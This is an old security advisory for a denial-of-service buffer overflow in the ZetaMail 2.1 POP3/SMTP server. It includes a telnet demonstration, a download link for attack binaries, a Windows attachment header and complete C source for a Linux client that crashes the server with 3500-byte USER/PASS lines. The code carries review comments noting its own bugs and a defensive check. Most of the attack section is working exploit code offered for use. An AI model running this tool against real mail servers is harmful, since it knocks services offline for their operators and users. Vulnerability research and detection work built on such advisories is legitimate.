COMMAND
ZetaMail Mail POP3/SMTP Server
SYSTEMS AFFECTED
ZetaMail 2.1 Mail POP3/SMTP Server
PROBLEM
UssrLabs found a local/remote DoS attack in ZetaMail 2.1 Mail
POP3/SMTP Server. The buffer overflow is caused by a long user
name/password of 3500 characters. There is not much to expand
on... just a simple hole. Example:
[gimmemore@itsme]$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK ZetaMail for 95 BD0211 <4294764405.063903189415041@itsme>
USER (buffer)
+OK Send password
PASS (buffer)
Overflow and crash, where (buffer) is 3500 characters. Binary and
source for the DoS for Windows / Linux:
http://www.ussrback.com/zmail/
Below are the MIME-encoded Windows version and the Linux source. Windows version:
---
Content-Type: application/octet-stream; name="zmaildos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="zmaildos.zip"
Content-MD5: dbGxWW5KxoFHiZnX9gYSvQ==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-----
Linux code:
/*
* Copyright (c) 1999 Ussr S.A.
* All rights reserved
* http://www.ussrback.com
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
/* Outgoing line buffer; main() fills it with 0x61 bytes, ends it with CRLF
 * and overwrites the first five bytes with the POP3 verb. */
char dos_code[3500];
/* Receive buffer for the server replies that main() prints. */
char buffy[256];
/* Target host string; main() sets it to argv[1]. */
char *host;
/* ip: IPv4 address placed in servaddr; port: TCP port (110 when no second
 * argument is given); sockfd: the TCP socket descriptor. */
int ip, port, sockfd;
/* Destination address passed to connect(). */
struct sockaddr_in servaddr;
/* Result of gethostbyname() for the target host. */
struct hostent *phost;
/*
 * Proof-of-concept client for the ZetaMail 2.1 POP3 overflow described in
 * the advisory text.
 *
 * argv[1] is the host name or dotted IPv4 address; argv[2] is the optional
 * port (110 when omitted). The program connects, prints the banner, sends a
 * 3500-byte "user " line, prints the reply, sends a 3500-byte "pass " line
 * and closes the socket. It returns 0 on every path, including errors.
 *
 * Defender's view: the root cause is a server that copies the USER/PASS
 * argument without bounding its length. RFC 1939 limits each argument to
 * 40 characters, so a POP3 command line of this size can be rejected by the
 * server and alerted on by network monitoring. The verbs are sent in lower
 * case and POP3 keywords are case-insensitive, so any such check should
 * match them case-insensitively.
 */
int
main(int argc, char **argv)
{
/* No host given: print usage and exit. */
if(argc < 2){
printf("Example DOS code for Zmail by Ussr labs.\n\n");
printf("Usage: %s hostname port (default 110)\n", argv[0]);
return(0);
}
if(argc == 2){
port = 110;
}
else {
/* NOTE(review): "%hd" stores a short, but the target is the int `port`
 * passed through a char * cast; this is a format/argument type mismatch,
 * and the sscanf() result is not checked. */
sscanf(argv[2], "%hd", (char *)&port);
}
printf("Example DOS code for Zmail by Ussr labs.\n\n");
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Error in socket funtion\n\n");
return(0);
}
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(port);
host = argv[1];
/* Assignment in the condition is intentional: try name resolution first,
 * then fall back to parsing a dotted-quad address. */
if(phost = gethostbyname(host)) {
/* NOTE(review): copies sizeof(u_long) bytes into the int `ip`; where
 * u_long is wider than int (e.g. LP64) this writes past `ip`. */
bcopy(phost->h_addr, (char *)&ip, sizeof(u_long));
}
else if((ip = inet_addr(host)) == -1)
{
printf("ERROR! Cant resolve: %s \n\n", argv[1]);
return(0);
}
servaddr.sin_addr.s_addr = ip;
/* The error returns from here on leave sockfd open; the process exits
 * right after, so the descriptor is released by the OS. */
if (connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) < 0)
{
printf("ERROR! Cant connect to: %s port %d\n\n", argv[1], port);
return(0);
}
/* Read and print the server greeting. */
memset(buffy, 0, sizeof(buffy));
/* NOTE(review): the recv() result is ignored, and a reply that fills all
 * 256 bytes leaves buffy without a terminating NUL, so the printf("%s")
 * below would read past the buffer. */
recv(sockfd, &buffy, sizeof(buffy), 0);
printf("%s",buffy);
/* Build the oversized line: 3500 bytes of 'a' (0x61), CRLF in the last two
 * bytes, and the verb written over the first five bytes. */
memset(dos_code, 0x61, sizeof(dos_code));
dos_code[3498] = '\r';
dos_code[3499] = '\n';
memcpy(&dos_code[0], "user ", strlen("user "));
/* send() result is not checked; a short write would go unnoticed. */
send(sockfd, dos_code, sizeof(dos_code), 0);
memset(buffy, 0, sizeof(buffy));
/* Same unterminated-buffer caveat as the first recv() above. */
recv(sockfd, &buffy, sizeof(buffy), 0);
printf("%s",buffy);
/* Reuse the same buffer, replacing only the verb for the password step. */
memcpy(&dos_code[0], "pass ", strlen("pass "));
send(sockfd, dos_code, sizeof(dos_code), 0);
/* Printed unconditionally; it does not confirm that either send() succeeded
 * or that the server was affected. */
printf("DOS code are send OK!..\n");
close(sockfd);
return(0);
}
SOLUTION
Install another program from the same vendor: MsgCore/95 2.11 or
MsgCore/NT 2.10.